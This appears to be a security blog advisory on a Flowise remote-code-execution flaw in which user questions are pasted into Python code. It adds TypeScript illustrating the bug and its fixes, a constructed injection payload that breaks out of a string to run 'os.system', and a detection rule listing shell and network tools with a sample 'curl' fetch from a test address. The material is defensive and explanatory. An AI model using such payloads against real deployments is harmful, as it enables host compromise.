Flowise RCE: Unchecked Input Leads to Code Execution

The National Vulnerability Database has published CVE-2026-41138, a high-severity remote code execution (RCE) vulnerability in Flowise, a drag-and-drop UI for building custom large language model (LLM) flows. In versions before 3.1.0, the AirtableAgent.ts component does not validate user input before handing it to the Pandas-backed agent.

User input is placed directly into the question parameter of a prompt template, and the resulting text is reflected into Python code without any sanitization. Because the input becomes part of the program that runs, anyone who can submit a question to a vulnerable Airtable agent flow can execute arbitrary Python on the host. NVD assigns the flaw a CVSSv3 base score of 8.3 (High).

This is not a theoretical weakness; it is a direct code injection vector. An attacker who exploits it runs code with the privileges of the Flowise process and can compromise the underlying system hosting the application. The fix ships in version 3.1.0, which makes patching an immediate priority.
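The following is an added illustration of the injection pattern described above, written here for this page; it is not Flowise's code. The Python template, the `records` and `answer` names, and the attacker payload are constructed for the example. What it shows is the shape of the bug and two ways out of it: a user-controlled question pasted into Python source (vulnerable), the same question emitted as a properly escaped Python string literal (hardened), and the question kept out of the program text entirely (preferred). A small scanner, `codeAfterLiteral`, makes the difference visible without running any Python.

```typescript
// Illustrative reconstruction of the pattern, not Flowise's code. All names
// (records, answer, PAYLOAD) are assumptions made for this example.

// Constructed attacker input: closes the string literal, runs a command, and
// comments out the dangling quote that follows in the template.
const PAYLOAD = 'x"; import os; os.system("id") #';

// Vulnerable: the question is interpolated into program text, so quotes and
// newlines inside it change the structure of the program.
function buildVulnerable(question: string): string {
  return [
    "import pandas as pd",
    "df = pd.DataFrame(records)",
    `question = "${question}"`,
    "print(answer(df, question))",
  ].join("\n");
}

// Hardened: the question is emitted as a Python string literal. JSON.stringify
// escapes every character that could end the literal (", \, newline and other
// control characters), and each escape it produces (\", \\, \n, \uXXXX) is also
// a valid Python str escape, so the value cannot turn into code.
function pyStringLiteral(value: string): string {
  return JSON.stringify(value);
}

function buildHardened(question: string): string {
  return [
    "import pandas as pd",
    "df = pd.DataFrame(records)",
    `question = ${pyStringLiteral(question)}`,
    "print(answer(df, question))",
  ].join("\n");
}

// Preferred: keep data out of code. The program text is constant and the
// question travels to the interpreter as an argument.
interface PythonJob { code: string; argv: string[] }

function buildOutOfBand(question: string): PythonJob {
  const code = [
    "import sys, pandas as pd",
    "df = pd.DataFrame(records)",
    "question = sys.argv[1]",
    "print(answer(df, question))",
  ].join("\n");
  return { code, argv: [question] };
}

// Scanner used to compare the builders: for a line of the form
// question = "<literal>", return whatever follows the closing quote, honouring
// backslash escapes. Non-empty text means the input escaped the literal and
// became code; null means the line has no double-quoted literal at all.
function codeAfterLiteral(line: string): string | null {
  const start = line.indexOf('"');
  if (start < 0) return null;
  for (let i = start + 1; i < line.length; i++) {
    if (line[i] === "\\") { i++; continue; } // skip the escaped character
    if (line[i] === '"') return line.slice(i + 1).trim();
  }
  return null; // unterminated literal
}

// Third line of each generated program is the one that carries the question.
function questionLine(code: string): string {
  return code.split("\n")[2];
}
```

Escaping closes the reflection bug, but the hardened builder still hands user- and model-driven Python to an interpreter, which is what a Pandas agent does by design. The durable mitigation is to run that interpreter in an isolated environment (separate container or process, no network egress, no access to the Flowise process's credentials) and to prefer the out-of-band form so that the program text never depends on untrusted data.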

What This Means For You

  • If your organization runs Flowise, check the installed version now. This is not a complex exploit chain; it is straightforward remote code execution from unchecked input. Upgrade to version 3.1.0 or later. If an exposed instance served a flow that uses the Airtable agent while vulnerable, treat the host as compromised and start incident response rather than only patching.

Detection Rules

The site attaches three auto-generated detection rules to this CVE, mapped to MITRE ATT&CK. Only the title of one is shown; the rule body is not reproduced on this page.

  • Rule: CVE-2026-41138 - Flowise AirtableAgent RCE via Pandas (Sigma YAML)
  • Severity: critical
  • ATT&CK technique: T1059.006, Command and Scripting Interpreter: Python (tactic: Execution)
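As an added example (not one of the site's generated rules), the check below expresses the behaviour behind the T1059.006 mapping as a process-lineage rule: the Node process that runs Flowise spawns a Python interpreter, and that interpreter spawns a shell or a network client. The events are constructed sample telemetry, the field names are assumptions, and the premise that Flowise invokes Python as a child process is an assumption made for the example rather than something this page states.

```typescript
// Added detection example over constructed process-creation events.
// Field names, values and the node -> python -> shell assumption are illustrative.

interface ProcEvent {
  pid: number;
  ppid: number;
  image: string;    // executable basename
  cmdline: string;
}

interface Alert { pid: number; chain: string }

// Constructed sample telemetry; all values invented (203.0.113.5 is TEST-NET-3).
const SAMPLE_EVENTS: ProcEvent[] = [
  { pid: 100, ppid: 1,   image: "node",    cmdline: "node /app/flowise/dist/index.js start" },
  { pid: 200, ppid: 100, image: "python3", cmdline: "python3 /tmp/flowise_pandas_tool.py" },
  { pid: 300, ppid: 200, image: "sh",      cmdline: "sh -c id" },
  { pid: 400, ppid: 200, image: "curl",    cmdline: "curl http://203.0.113.5/x" },
  { pid: 500, ppid: 1,   image: "python3", cmdline: "python3 /opt/jobs/nightly.py" },
  { pid: 600, ppid: 500, image: "sh",      cmdline: "sh -c ls" },  // unrelated python job
];

const PYTHON_IMAGE = /^python(\d+(\.\d+)?)?$/;
const BREAKOUT_CHILDREN = new Set(["sh", "bash", "dash", "zsh", "curl", "wget", "nc"]);

// Flag every <shell or net client> whose parent is python and whose grandparent
// is the node process hosting Flowise. Walking only two levels keeps the rule
// cheap; widen it if your deployment wraps python in an extra launcher.
function detectFlowisePythonBreakout(events: ProcEvent[]): Alert[] {
  const byPid = new Map<number, ProcEvent>();
  for (const e of events) byPid.set(e.pid, e);

  const alerts: Alert[] = [];
  for (const child of events) {
    if (!BREAKOUT_CHILDREN.has(child.image)) continue;
    const py = byPid.get(child.ppid);
    if (!py || !PYTHON_IMAGE.test(py.image)) continue;
    const host = byPid.get(py.ppid);
    if (!host || host.image !== "node" || !/flowise/i.test(host.cmdline)) continue;
    alerts.push({ pid: child.pid, chain: `${host.image} -> ${py.image} -> ${child.image}` });
  }
  return alerts;
}

function runSample(): Alert[] {
  return detectFlowisePythonBreakout(SAMPLE_EVENTS);
}
```

On the constructed data the rule fires for pids 300 and 400 and ignores pid 600, whose Python parent was not started by Flowise. Before deploying a rule like this, baseline which child processes your Flowise flows legitimately spawn, and pair the process alert with the chat or prediction request logs so the offending question can be recovered.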

Indicators of Compromise

The entries below describe the vulnerable version range and component rather than observed attacker artifacts.

ID             | Type | Indicator
CVE-2026-41138 | RCE  | Flowise < 3.1.0
CVE-2026-41138 | RCE  | Vulnerable component: AirtableAgent.ts
CVE-2026-41138 | RCE  | Vulnerable function: input applied to the 'question' parameter within the prompt template, reflected into Python code without sanitization

Source & Attribution

Source platform: NVD
Channel: National Vulnerability Database
Published: April 23, 2026 at 23:16 UTC

This content was AI-rewritten and enriched by Shimi's Cyber World based on the original source. All intellectual property rights remain with the original author.

